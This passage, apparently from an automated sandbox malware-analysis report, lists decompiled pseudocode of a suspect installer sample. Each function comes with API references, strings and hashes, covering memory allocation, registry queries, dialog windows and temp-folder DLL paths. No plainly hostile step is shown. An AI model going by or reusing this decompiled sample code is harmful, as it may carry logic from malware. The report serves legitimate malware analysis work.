                                  						if(_t36 == 0) {
                                  							L13:
                                  							_t38 = ( *_t74 & 0x0000ffff) - 0x30;
                                  							_t74 = _t74 + _t67;
                                  							_t34 = E732F1312(E732F135A(_t38));
                                  							L14:
                                  							goto L25;
                                  						}
                                  						_t40 = _t36 - _t67;
                                  						if(_t40 == 0) {
                                  							L11:
                                  							_t80 = ( *_t74 & 0x0000ffff) - 0x30;
                                  							_t74 = _t74 + _t67;
                                  							_t34 = E732F1381(_t80, E732F12E3());
                                  							goto L14;
                                  						}
                                  						L8:
                                  						if(_t40 == 1) {
                                  							_t81 = GlobalAlloc(0x40, _t66 + 4);
                                  							_t10 = _t81 + 4; // 0x4
                                  							E732F1603(_t10,  *0x732f5074, _t66);
                                  							_t86 = _t86 + 0xc;
                                  							 *_t81 =  *0x732f5040;
                                  							 *0x732f5040 = _t81;
                                  						}
                                  						goto L26;
                                  					}
                                  					if(_t88 == 0) {
                                  						_t48 =  *0x732f5070;
                                  						_t77 =  *_t48;
                                  						 *_t48 =  *_t77;
                                  						_t49 = _v0;
                                  						_t84 =  *((intOrPtr*)(_v0 + 0xc));
                                  						if( *((short*)(_t77 + 4)) == 0x2691) {
                                  							E732F1603(_t49, _t77 + 8, 0x38);
                                  							_t86 = _t86 + 0xc;
                                  						}
                                  						 *((intOrPtr*)( *_a12 + 0xc)) = _t84;
                                  						GlobalFree(_t77);
                                  						goto L26;
                                  					}
                                  					_t54 = _t29 - 0x46;
                                  					if(_t54 == 0) {
                                  						_t82 = GlobalAlloc(0x40,  *0x732f506c +  *0x732f506c + 8);
                                  						 *((intOrPtr*)(_t82 + 4)) = 0x2691;
                                  						_t14 = _t82 + 8; // 0x8
                                  						E732F1603(_t14, _v0, 0x38);
                                  						_t86 = _t86 + 0xc;
                                  						 *_t82 =  *( *0x732f5070);
                                  						 *( *0x732f5070) = _t82;
                                  						goto L26;
                                  					}
                                  					_t63 = _t54 - 6;
                                  					if(_t63 == 0) {
                                  						goto L23;
                                  					}
                                  					_t64 = _t63 - 4;
                                  					if(_t64 == 0) {
                                  						 *_t74 =  *_t74 + 0xa;
                                  						goto L13;
                                  					}
                                  					_t40 = _t64 - _t67;
                                  					if(_t40 == 0) {
                                  						 *_t74 =  *_t74 + 0xa;
                                  						goto L11;
                                  					}
                                  					goto L8;
                                  					L26:
                                  				} while ( *_t74 != 0);
                                  				_t27 = _v0;
                                  				goto L28;
                                  			}


























                                  0x732f10eb
                                  0x732f1100
                                  0x732f1109
                                  0x732f110e
                                  0x732f1119
                                  0x732f111c
                                  0x732f1125
                                  0x732f1129
                                  0x732f112b
                                  0x732f12b0
                                  0x732f12ba
                                  0x732f12ba
                                  0x732f1132
                                  0x732f1132
                                  0x732f1137
                                  0x732f1138
                                  0x732f113a
                                  0x732f113d
                                  0x732f1256
                                  0x732f1259
                                  0x732f1271
                                  0x732f1271
                                  0x732f1278
                                  0x00000000
                                  0x00000000
                                  0x732f1285
                                  0x732f128a
                                  0x732f128f
                                  0x732f1294
                                  0x732f129a
                                  0x732f129b
                                  0x00000000
                                  0x732f129b
                                  0x732f125b
                                  0x732f125e
                                  0x732f11bc
                                  0x732f11bf
                                  0x732f11c2
                                  0x732f11cb
                                  0x732f11d0
                                  0x00000000
                                  0x732f11d1
                                  0x732f1264
                                  0x732f1266
                                  0x732f11a2
                                  0x732f11a5
                                  0x732f11a8
                                  0x732f11b1
                                  0x00000000
                                  0x732f11b1
                                  0x732f1164
                                  0x732f1165
                                  0x732f1177
                                  0x732f1180
                                  0x732f1184
                                  0x732f118e
                                  0x732f1191
                                  0x732f1193
                                  0x732f1193
                                  0x00000000
                                  0x732f1165
                                  0x732f1143
                                  0x732f1218
                                  0x732f121d
                                  0x732f1221
                                  0x732f1223
                                  0x732f122c
                                  0x732f122f
                                  0x732f1238
                                  0x732f123d
                                  0x732f123d
                                  0x732f1247
                                  0x732f124a
                                  0x00000000
                                  0x732f1250
                                  0x732f1149
                                  0x732f114c
                                  0x732f11e9
                                  0x732f11ed
                                  0x732f11f7
                                  0x732f11fb
                                  0x732f1205
                                  0x732f120a
                                  0x732f1211
                                  0x00000000
                                  0x732f1211
                                  0x732f1152
                                  0x732f1155
                                  0x00000000
                                  0x00000000
                                  0x732f115b
                                  0x732f115e
                                  0x732f11b8
                                  0x00000000
                                  0x732f11b8
                                  0x732f1160
                                  0x732f1162
                                  0x732f119e
                                  0x00000000
                                  0x732f119e
                                  0x00000000
                                  0x732f12a1
                                  0x732f12a1
                                  0x732f12ab
                                  0x00000000

                                  APIs
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.778451619.00000000732F1000.00000020.00000001.01000000.00000004.sdmp, Offset: 732F0000, based on PE: true
                                  • Associated: 00000000.00000002.778443971.00000000732F0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                  • Associated: 00000000.00000002.778458851.00000000732F4000.00000002.00000001.01000000.00000004.sdmpDownload File
                                  • Associated: 00000000.00000002.778463521.00000000732F6000.00000002.00000001.01000000.00000004.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_732f0000_SecuriteInfo.jbxd
                                  Similarity
                                  • API ID: Global$Free$Alloc
                                  • String ID:
                                  • API String ID: 1780285237-0
                                  • Opcode ID: 75c9e3d83311588505f50acb07ac8252001322cc84f87b5fe1dd999f9ad6ca42
                                  • Instruction ID: 9cf1144c4182883db4e24c3a3040f1da33d181ee2acb7b682f88377dcf2b054a
                                  • Opcode Fuzzy Hash: 75c9e3d83311588505f50acb07ac8252001322cc84f87b5fe1dd999f9ad6ca42
                                  • Instruction Fuzzy Hash: 145194B6600217DFE700EFA9C548B16B7F8FB08725BA48119F90ADB250E774FA80DB54
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 92%
                                  			E0040263E(void* __ebx, void* __edx, intOrPtr* __edi) {
                                  				signed int _t14;
                                  				int _t17;
                                  				void* _t24;
                                  				intOrPtr* _t29;
                                  				void* _t31;
                                  				signed int _t32;
                                  				void* _t35;
                                  				void* _t40;
                                  				signed int _t42;
                                  
                                  				_t29 = __edi;
                                  				_t24 = __ebx;
                                  				_t14 =  *(_t35 - 0x28);
                                  				_t40 = __edx - 0x38;
                                  				 *(_t35 - 0x10) = _t14;
                                  				_t27 = 0 | _t40 == 0x00000000;
                                  				_t32 = _t40 == 0;
                                  				if(_t14 == __ebx) {
                                  					if(__edx != 0x38) {
                                  						_t17 = lstrlenW(E00402DA6(0x11)) + _t16;
                                  					} else {
                                  						E00402DA6(0x21);
                                  						E0040655F("C:\Users\jones\AppData\Local\Temp\nsw2F33.tmp", "C:\Users\jones\AppData\Local\Temp\nsw2F33.tmp\System.dll", 0x400);
                                  						_t17 = lstrlenA("C:\Users\jones\AppData\Local\Temp\nsw2F33.tmp\System.dll");
                                  					}
                                  				} else {
                                  					E00402D84(1);
                                  					 *0x40adf0 = __ax;
                                  					 *((intOrPtr*)(__ebp - 0x44)) = __edx;
                                  				}
                                  				 *(_t35 + 8) = _t17;
                                  				if( *_t29 == _t24) {
                                  					L13:
                                  					 *((intOrPtr*)(_t35 - 4)) = 1;
                                  				} else {
                                  					_t31 = E0040649D(_t27, _t29);
                                  					if((_t32 |  *(_t35 - 0x10)) != 0 ||  *((intOrPtr*)(_t35 - 0x24)) == _t24 || E0040610E(_t31, _t31) >= 0) {
                                  						_t14 = E004060DF(_t31, "C:\Users\jones\AppData\Local\Temp\nsw2F33.tmp\System.dll",  *(_t35 + 8));
                                  						_t42 = _t14;
                                  						if(_t42 == 0) {
                                  							goto L13;
                                  						}
                                  					} else {
                                  						goto L13;
                                  					}
                                  				}
                                  				 *0x434f88 =  *0x434f88 +  *((intOrPtr*)(_t35 - 4));
                                  				return 0;
                                  			}












                                  0x0040263e
                                  0x0040263e
                                  0x0040263e
                                  0x00402643
                                  0x00402646
                                  0x00402649
                                  0x0040264e
                                  0x00402650
                                  0x00402670
                                  0x004026aa
                                  0x00402672
                                  0x00402674
                                  0x00402688
                                  0x00402695
                                  0x00402695
                                  0x00402652
                                  0x00402654
                                  0x00402659
                                  0x00402667
                                  0x0040266a
                                  0x004026af
                                  0x004026b2
                                  0x0040292e
                                  0x0040292e
                                  0x004026b8
                                  0x004026c1
                                  0x004026c3
                                  0x004026e2
                                  0x004015b4
                                  0x004015b6
                                  0x00000000
                                  0x004015bc
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x004026c3
                                  0x00402c2d
                                  0x00402c39

                                  APIs
                                  • lstrlenA.KERNEL32(C:\Users\user\AppData\Local\Temp\nsw2F33.tmp\System.dll), ref: 00402695
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.777947969.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.777940223.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.777964906.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.777971054.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.777977082.000000000040D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.778005953.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.778015938.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.778022993.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.778039326.000000000046A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.778046146.000000000046C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                                  Similarity
                                  • API ID: lstrlen
                                  • String ID: C:\Users\user\AppData\Local\Temp\nsw2F33.tmp$C:\Users\user\AppData\Local\Temp\nsw2F33.tmp\System.dll
                                  • API String ID: 1659193697-1841841627
                                  • Opcode ID: c6271de305d28e4340191c40b24bb758c2950df04ec3194b8553c0e0fd6979b8
                                  • Instruction ID: edf8e5a6553ae7ef136857fb61bcac29e22bbc78049b19fa22ca3c34260198f3
                                  • Opcode Fuzzy Hash: c6271de305d28e4340191c40b24bb758c2950df04ec3194b8553c0e0fd6979b8
                                  • Instruction Fuzzy Hash: 2611EB71A00215BBCB10BFB18E4AAAE7665AF40744F25443FE002B71C2EAFC8891565E
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 100%
                                  			E00403019(intOrPtr _a4) {
                                  				long _t2;
                                  				struct HWND__* _t3;
                                  				struct HWND__* _t6;
                                  
                                  				if(_a4 == 0) {
                                  					__eflags =  *0x42aa20; // 0x0
                                  					if(__eflags == 0) {
                                  						_t2 = GetTickCount();
                                  						__eflags = _t2 -  *0x434f0c;
                                  						if(_t2 >  *0x434f0c) {
                                  							_t3 = CreateDialogParamW( *0x434f00, 0x6f, 0, E00402F93, 0);
                                  							 *0x42aa20 = _t3;
                                  							return ShowWindow(_t3, 5);
                                  						}
                                  						return _t2;
                                  					} else {
                                  						return E00406946(0);
                                  					}
                                  				} else {
                                  					_t6 =  *0x42aa20; // 0x0
                                  					if(_t6 != 0) {
                                  						_t6 = DestroyWindow(_t6);
                                  					}
                                  					 *0x42aa20 = 0;
                                  					return _t6;
                                  				}
                                  			}






                                  0x00403020
                                  0x0040303a
                                  0x00403040
                                  0x0040304a
                                  0x00403050
                                  0x00403056
                                  0x00403067
                                  0x00403070
                                  0x00000000
                                  0x00403075
                                  0x0040307c
                                  0x00403042
                                  0x00403049
                                  0x00403049
                                  0x00403022
                                  0x00403022
                                  0x00403029
                                  0x0040302c
                                  0x0040302c
                                  0x00403032
                                  0x00403039
                                  0x00403039

                                  APIs
                                  • DestroyWindow.USER32(00000000,00000000,004031F7,00000001,?,?,?,?,?,0040387D,?), ref: 0040302C
                                  • GetTickCount.KERNEL32 ref: 0040304A
                                  • CreateDialogParamW.USER32 ref: 00403067
                                  • ShowWindow.USER32(00000000,00000005,?,?,?,?,?,0040387D,?), ref: 00403075
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.777947969.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.777940223.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.777964906.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.777971054.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.777977082.000000000040D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.778005953.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.778015938.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.778022993.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.778039326.000000000046A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.778046146.000000000046C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                                  Similarity
                                  • API ID: Window$CountCreateDestroyDialogParamShowTick
                                  • String ID:
                                  • API String ID: 2102729457-0
                                  • Opcode ID: a982ea5e0a4ecb993fc2e9b794e4afe077943b4b771bcbca33e5c7758572dd30
                                  • Instruction ID: 3364d2369d767f53e7c05e99e54cbc9c067443d5da9c9f227d7c3a258cba7bb7
                                  • Opcode Fuzzy Hash: a982ea5e0a4ecb993fc2e9b794e4afe077943b4b771bcbca33e5c7758572dd30
                                  • Instruction Fuzzy Hash: A9F08270702A20AFC2316F50FE4998B7F68FB44B56741447AF446B15ACCB380DA2CB9D
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 53%
                                  			E00405F14(void* __eflags, intOrPtr _a4) {
                                  				int _t11;
                                  				signed char* _t12;
                                  				intOrPtr _t18;
                                  				intOrPtr* _t21;
                                  				signed int _t23;
                                  
                                  				E0040653D(0x42fa70, _a4);
                                  				_t21 = E00405EB7(0x42fa70);
                                  				if(_t21 != 0) {
                                  					E004067C4(_t21);
                                  					if(( *0x434f18 & 0x00000080) == 0) {
                                  						L5:
                                  						_t23 = _t21 - 0x42fa70 >> 1;
                                  						while(1) {
                                  							_t11 = lstrlenW(0x42fa70);
                                  							_push(0x42fa70);
                                  							if(_t11 <= _t23) {
                                  								break;
                                  							}
                                  							_t12 = E00406873();
                                  							if(_t12 == 0 || ( *_t12 & 0x00000010) != 0) {
                                  								E00405E58(0x42fa70);
                                  								continue;
                                  							} else {
                                  								goto L1;
                                  							}
                                  						}
                                  						E00405E0C();
                                  						return 0 | GetFileAttributesW(??) != 0xffffffff;
                                  					}
                                  					_t18 =  *_t21;
                                  					if(_t18 == 0 || _t18 == 0x5c) {
                                  						goto L1;
                                  					} else {
                                  						goto L5;
                                  					}
                                  				}
                                  				L1:
                                  				return 0;
                                  			}








                                  0x00405f20
                                  0x00405f2b
                                  0x00405f2f
                                  0x00405f36
                                  0x00405f42
                                  0x00405f52
                                  0x00405f54
                                  0x00405f6c
                                  0x00405f6d
                                  0x00405f74
                                  0x00405f75
                                  0x00000000
                                  0x00000000
                                  0x00405f58
                                  0x00405f5f
                                  0x00405f67
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x00405f5f
                                  0x00405f77
                                  0x00000000
                                  0x00405f8b
                                  0x00405f44
                                  0x00405f4a
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x00405f4a
                                  0x00405f31
                                  0x00000000

                                  APIs
                                    • Part of subcall function 0040653D: lstrcpynW.KERNEL32(?,?,00000400,0040369D,00433F00,NSIS Error), ref: 0040654A
                                    • Part of subcall function 00405EB7: CharNextW.USER32(?,?,0042FA70,?,00405F2B,0042FA70,0042FA70,76CDFAA0,?,C:\Users\user\AppData\Local\Temp\,00405C69,?,76CDFAA0,C:\Users\user\AppData\Local\Temp\,00000000), ref: 00405EC5
                                    • Part of subcall function 00405EB7: CharNextW.USER32(00000000), ref: 00405ECA
                                    • Part of subcall function 00405EB7: CharNextW.USER32(00000000), ref: 00405EE2
                                  • lstrlenW.KERNEL32(0042FA70,00000000,0042FA70,0042FA70,76CDFAA0,?,C:\Users\user\AppData\Local\Temp\,00405C69,?,76CDFAA0,C:\Users\user\AppData\Local\Temp\,00000000), ref: 00405F6D
                                  • GetFileAttributesW.KERNEL32(0042FA70,0042FA70,0042FA70,0042FA70,0042FA70,0042FA70,00000000,0042FA70,0042FA70,76CDFAA0,?,C:\Users\user\AppData\Local\Temp\,00405C69,?,76CDFAA0,C:\Users\user\AppData\Local\Temp\), ref: 00405F7D
                                  Strings
                                  • C:\Users\user\AppData\Local\Temp\, xrefs: 00405F14
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.777947969.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.777940223.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.777964906.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.777971054.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.777977082.000000000040D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.778005953.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.778015938.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.778022993.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.778039326.000000000046A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.778046146.000000000046C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                                  Similarity
                                  • API ID: CharNext$AttributesFilelstrcpynlstrlen
                                  • String ID: C:\Users\user\AppData\Local\Temp\
                                  • API String ID: 3248276644-3081826266
                                  • Opcode ID: 442e1b1d96b1c23b6c0207761c3788c7dd97485575ed4e88a223653099446a7a
                                  • Instruction ID: e20fb510edeaf32ba19235dad054e15b0ffac27cf679254cac4fdbc394554759
                                  • Opcode Fuzzy Hash: 442e1b1d96b1c23b6c0207761c3788c7dd97485575ed4e88a223653099446a7a
                                  • Instruction Fuzzy Hash: E3F0F426119D6226DB22333A5C05EAF0554CE9276475A023BF895B12C5DB3C8A43D8AE
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 89%
                                  			E00405513(struct HWND__* _a4, int _a8, int _a12, long _a16) {
                                  				int _t15;
                                  				long _t16;
                                  
                                  				_t15 = _a8;
                                  				if(_t15 != 0x102) {
                                  					if(_t15 != 0x200) {
                                  						_t16 = _a16;
                                  						L7:
                                  						if(_t15 == 0x419 &&  *0x42d254 != _t16) {
                                  							_push(_t16);
                                  							_push(6);
                                  							 *0x42d254 = _t16;
                                  							E00404ED4();
                                  						}
                                  						L11:
                                  						return CallWindowProcW( *0x42d25c, _a4, _t15, _a12, _t16);
                                  					}
                                  					if(IsWindowVisible(_a4) == 0) {
                                  						L10:
                                  						_t16 = _a16;
                                  						goto L11;
                                  					}
                                  					_t16 = E00404E54(_a4, 1);
                                  					_t15 = 0x419;
                                  					goto L7;
                                  				}
                                  				if(_a12 != 0x20) {
                                  					goto L10;
                                  				}
                                  				E004044E5(0x413);
                                  				return 0;
                                  			}





                                  0x00405517
                                  0x00405521
                                  0x0040553d
                                  0x0040555f
                                  0x00405562
                                  0x00405568
                                  0x00405572
                                  0x00405573
                                  0x00405575
                                  0x0040557b
                                  0x0040557b
                                  0x00405585
                                  0x00000000
                                  0x00405593
                                  0x0040554a
                                  0x00405582
                                  0x00405582
                                  0x00000000
                                  0x00405582
                                  0x00405556
                                  0x00405558
                                  0x00000000
                                  0x00405558
                                  0x00405527
                                  0x00000000
                                  0x00000000
                                  0x0040552e
                                  0x00000000

                                  APIs
                                  • IsWindowVisible.USER32(?), ref: 00405542
                                  • CallWindowProcW.USER32(?,?,?,?), ref: 00405593
                                    • Part of subcall function 004044E5: SendMessageW.USER32(000103E2,00000000,00000000,00000000), ref: 004044F7
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.777947969.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.777940223.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.777964906.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.777971054.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.777977082.000000000040D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.778005953.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.778015938.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.778022993.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.778039326.000000000046A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.778046146.000000000046C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                                  Similarity
                                  • API ID: Window$CallMessageProcSendVisible
                                  • String ID:
                                  • API String ID: 3748168415-3916222277
                                  • Opcode ID: 0dea828d0dd479423763887dac230e90f27d8b8ae518018479b0ad82d517bb95
                                  • Instruction ID: 904a7c61355239921aaa7855b64c86422fca6e8886f64d9e6fcbc6a993ea73ec
                                  • Opcode Fuzzy Hash: 0dea828d0dd479423763887dac230e90f27d8b8ae518018479b0ad82d517bb95
                                  • Instruction Fuzzy Hash: F3017CB1100608BFDF209F11DD80AAB3B27EB84754F50453AFA01762D5D77A8E92DA69
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 90%
                                  			E0040640B(void* __ecx, void* __eflags, intOrPtr _a4, int _a8, short* _a12, char* _a16, signed int _a20) {
                                  				int _v8;
                                  				long _t21;
                                  				long _t24;
                                  				char* _t30;
                                  
                                  				asm("sbb eax, eax");
                                  				_v8 = 0x800;
                                  				_t21 = E004063AA(__eflags, _a4, _a8,  ~_a20 & 0x00000100 | 0x00020019,  &_a20);
                                  				_t30 = _a16;
                                  				if(_t21 != 0) {
                                  					L4:
                                  					 *_t30 =  *_t30 & 0x00000000;
                                  				} else {
                                  					_t24 = RegQueryValueExW(_a20, _a12, 0,  &_a8, _t30,  &_v8);
                                  					_t21 = RegCloseKey(_a20);
                                  					_t30[0x7fe] = _t30[0x7fe] & 0x00000000;
                                  					if(_t24 != 0 || _a8 != 1 && _a8 != 2) {
                                  						goto L4;
                                  					}
                                  				}
                                  				return _t21;
                                  			}







                                  0x00406419
                                  0x0040641b
                                  0x00406433
                                  0x00406438
                                  0x0040643d
                                  0x0040647b
                                  0x0040647b
                                  0x0040643f
                                  0x00406451
                                  0x0040645c
                                  0x00406462
                                  0x0040646d
                                  0x00000000
                                  0x00000000
                                  0x0040646d
                                  0x00406481

                                  APIs
                                  • RegQueryValueExW.ADVAPI32(?,?,00000000,00000000,?,00000800,00000000,?,00000000,?,?,Call,?,?,00406672,80000002), ref: 00406451
                                  • RegCloseKey.ADVAPI32(?,?,00406672,80000002,Software\Microsoft\Windows\CurrentVersion,Call,Call,Call,00000000,Skipped: C:\Users\user\AppData\Local\Temp\nsw2F33.tmp\System.dll), ref: 0040645C
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.777947969.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.777940223.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.777964906.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.777971054.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.777977082.000000000040D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.778005953.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.778015938.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.778022993.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.778039326.000000000046A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.778046146.000000000046C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                                  Similarity
                                  • API ID: CloseQueryValue
                                  • String ID: Call
                                  • API String ID: 3356406503-1824292864
                                  • Opcode ID: a598e195228f1036644e08b1753da052d1713cd74bd9ea8ab147b12b545f69e3
                                  • Instruction ID: a8d415a3dc4e4479eaaa65942f717852bb8bd3539c12dad3b2e52d491ce509ba
                                  • Opcode Fuzzy Hash: a598e195228f1036644e08b1753da052d1713cd74bd9ea8ab147b12b545f69e3
                                  • Instruction Fuzzy Hash: FB017C72510209AADF21CF51CC09EDB3BB8FB54364F01803AFD5AA6190D738D968DBA8
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 100%
                                  			E00403B57() {
                                  				void* _t2;
                                  				void* _t3;
                                  				void* _t6;
                                  				void* _t8;
                                  
                                  				_t8 =  *0x42b22c;
                                  				_t3 = E00403B3C(_t2, 0);
                                  				if(_t8 != 0) {
                                  					do {
                                  						_t6 = _t8;
                                  						_t8 =  *_t8;
                                  						FreeLibrary( *(_t6 + 8));
                                  						_t3 = GlobalFree(_t6);
                                  					} while (_t8 != 0);
                                  				}
                                  				 *0x42b22c =  *0x42b22c & 0x00000000;
                                  				return _t3;
                                  			}







                                  0x00403b58
                                  0x00403b60
                                  0x00403b67
                                  0x00403b6a
                                  0x00403b6a
                                  0x00403b6c
                                  0x00403b71
                                  0x00403b78
                                  0x00403b7e
                                  0x00403b82
                                  0x00403b83
                                  0x00403b8b

                                  APIs
                                  • FreeLibrary.KERNEL32(?,76CDFAA0,00000000,C:\Users\user\AppData\Local\Temp\,00403B2F,00403A5E,?), ref: 00403B71
                                  • GlobalFree.KERNEL32 ref: 00403B78
                                  Strings
                                  • C:\Users\user\AppData\Local\Temp\, xrefs: 00403B57
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.777947969.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.777940223.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.777964906.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.777971054.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.777977082.000000000040D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.778005953.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.778015938.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.778022993.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.778039326.000000000046A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.778046146.000000000046C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                                  Similarity
                                  • API ID: Free$GlobalLibrary
                                  • String ID: C:\Users\user\AppData\Local\Temp\
                                  • API String ID: 1100898210-3081826266
                                  • Opcode ID: 14d9b0f9b7ecca22f0083886da8930ddd6c03ed0d6fdc94ff3a28603f1b7b4ab
                                  • Instruction ID: 19c5699a9bb8b3376c06320bd1355d3f7d45777e2bc9a3354ca833756e7661a4
                                  • Opcode Fuzzy Hash: 14d9b0f9b7ecca22f0083886da8930ddd6c03ed0d6fdc94ff3a28603f1b7b4ab
                                  • Instruction Fuzzy Hash: 40E0EC3290212097C7615F55FE08B6E7B78AF49B26F05056AE884BB2628B746D428BDC
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 77%
                                  			E00405E58(WCHAR* _a4) {
                                  				WCHAR* _t5;
                                  				WCHAR* _t7;
                                  
                                  				_t7 = _a4;
                                  				_t5 =  &(_t7[lstrlenW(_t7)]);
                                  				while( *_t5 != 0x5c) {
                                  					_push(_t5);
                                  					_push(_t7);
                                  					_t5 = CharPrevW();
                                  					if(_t5 > _t7) {
                                  						continue;
                                  					}
                                  					break;
                                  				}
                                  				 *_t5 =  *_t5 & 0x00000000;
                                  				return  &(_t5[1]);
                                  			}





                                  0x00405e59
                                  0x00405e63
                                  0x00405e66
                                  0x00405e6c
                                  0x00405e6d
                                  0x00405e6e
                                  0x00405e76
                                  0x00000000
